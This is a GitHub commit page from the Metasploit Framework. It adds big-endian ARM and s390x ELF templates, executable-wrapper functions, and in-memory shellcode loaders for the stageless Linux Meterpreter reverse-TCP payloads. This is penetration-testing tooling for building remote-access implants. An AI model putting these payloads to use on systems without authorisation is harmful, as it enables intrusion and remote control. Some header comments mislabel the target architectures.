Skip to content

Commit

Permalink
ARMBe and Zarch stageless payload
Browse files Browse the repository at this point in the history
  • Loading branch information
@msutovsky-r7
msutovsky-r7 committed Feb 13, 2025
1 parent f4d49da commit eb4abf6
Show file tree
Hide file tree
Showing 11 changed files with 106 additions and 15 deletions.
34 changes: 34 additions & 0 deletions data/templates/src/elf/exe/elf_armbe_template.s
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x2800 ; e_machine = AARCH64
dd 0x01000000 ; e_version
dd 0x54800000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx

ehdrsize equ $ - ehdr

phdr: ; Elf32_Phdr

dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00800000 ; p_vaddr
dd 0x00800000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00100000 ; p_align

phdrsize equ $ - phdr

_start:
33 changes: 33 additions & 0 deletions data/templates/src/elf/exe/elf_zarch_template.s
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
; build with:

BITS 64


ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1600 ; e_machine = PowerPC
dd 0x01000000 ; e_version
dq 0x7810000000000000 ; e_entry
dq 0x4000000000000000 ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw 0x4000 ; e_ehsize
dw 0x3800 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx

phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = PT_LOAD
dd 0x07000000 ; p_flags = rwx
dq 0 ; p_offset
dq 0x0010000000000000 ; p_vaddr
dq 0x0010000000000000 ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x0000100000000000 ; p_align

_start:
Binary file added data/templates/template_armbe_linux.bin
View file
Binary file not shown.
Binary file added data/templates/template_zarch_linux.bin
View file
Binary file not shown.
Empty file added lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb
View file
Empty file.
Empty file added lib/msf/core/payload/linux/armle/meterpreter_loader.rb
View file
Empty file.
Empty file added lib/msf/core/payload/linux/ppc/meterpreter_loader.rb
View file
Empty file.
Empty file added lib/msf/core/payload/linux/zarch/meterpreter_loader.rb
View file
Empty file.
25 changes: 25 additions & 0 deletions lib/msf/util/exe.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1198,6 +1198,27 @@ def self.to_linux_armle_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_armle_linux.bin', code)
end

# self.to_linux_armbe_elf
#
# @param framework [Msf::Framework]
# @param code [String]
# @param opts [Hash]
# @option [String] :template
# @return [String] Returns an elf
def self.to_linux_armbe_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_armbe_linux.bin', code, true)
end

# self.to_linux_zarch_elf
#
# @param framework [Msf::Framework]
# @param code [String]
# @param opts [Hash]
# @option [String] :template
# @return [String] Returns an elf
def self.to_linux_zarch_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_zarch_linux.bin', code, true)
end
# self.to_linux_armle_elf_dll
#
# @param framework [Msf::Framework]
Expand Down Expand Up @@ -2209,6 +2230,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
to_linux_aarch64_elf(framework, code, exeopts)
when ARCH_ARMLE
to_linux_armle_elf(framework, code, exeopts)
when ARCH_ARMBE
to_linux_armbe_elf(framework, code, exeopts)
when ARCH_MIPSBE
to_linux_mipsbe_elf(framework, code, exeopts)
when ARCH_MIPSLE
Expand All @@ -2225,6 +2248,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
to_linux_ppc_elf(framework, code, exeopts)
when ARCH_PPCE500V2
to_linux_ppce500v2_elf(framework, code, exeopts)
when ARCH_ZARCH
to_linux_zarch_elf(framework, code, exeopts)
end
elsif plat && plat.index(Msf::Module::Platform::BSD)
case arch
Expand Down
5 changes: 1 addition & 4 deletions modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -78,11 +78,8 @@ def generate(_opts = {})
0x0b70a0e3, # 0x1094: mov r7, #0xb 0x0b70a0e3
0x000000ef, # 0x1098: svc #0 0x000000ef
0xe0ffffeb, # 0x109c: bl #0x1024 0xe0ffffeb

payload.length,
0x00000123 # .word
].pack('V*')
fd_path = '/proc/self/fd/'.bytes.pack('C*') + "\x00" * 16
in_memory_loader + fd_path + payload
in_memory_loader + [payload.length, 0x00000123].pack('N*') + fd_path + payload
end
end
24 changes: 13 additions & 11 deletions modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,10 +3,8 @@
# Current source: https://github.com/rapid7/metasploit-framework
##


# Module generated by tools/modules/generate_mettle_payloads.rb
module MetasploitModule

CachedSize = 1271304

include Msf::Payload::Single
Expand All @@ -17,18 +15,18 @@ def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter, Reverse TCP Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Name' => 'Linux Meterpreter, Reverse TCP Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>',
'Brent Cook <brent_cook[at]rapid7.com>',
'timwr'
],
'Platform' => 'linux',
'Arch' => ARCH_ZARCH,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_zarch_Linux
'Platform' => 'linux',
'Arch' => ARCH_ZARCH,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_zarch_Linux
)
)
end
Expand All @@ -38,6 +36,10 @@ def generate(_opts = {})
scheme: 'tcp',
stageless: true
}.merge(mettle_logging_config)
MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec
payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec
in_memory_loader = [
0x0d80a738, 0x00019200, 0xf0004120, 0xf000a719, 0x015e0a00, 0x18621744, 0x1848a758, 0x00ae1a45, 0x58404000, 0x17331838, 0xa75800b2, 0x1a350a04, 0x17339200, 0xf000a758, 0x00011bf5, 0x1876a758, 0x000a1766, 0x1d651846, 0xc2490000, 0x00304240, 0xf000a758, 0x00011bf5, 0xa7580000, 0x19754720, 0x803aa758, 0x000e1bf5, 0x922ff001, 0x9270f002, 0x9272f003, 0x926ff004, 0x9263f005, 0x922ff006, 0x9273f007, 0x9265f008, 0x926cf009, 0x9266f00a, 0x922ff00b, 0x9266f00c, 0x9264f00d, 0x922ff00e, 0x4120f001, 0xa7380000, 0xa7480000, 0x0a0b0707, payload.length
].pack('N*')
in_memory_loader + payload
end
end

0 comments on commit eb4abf6

Please sign in to comment.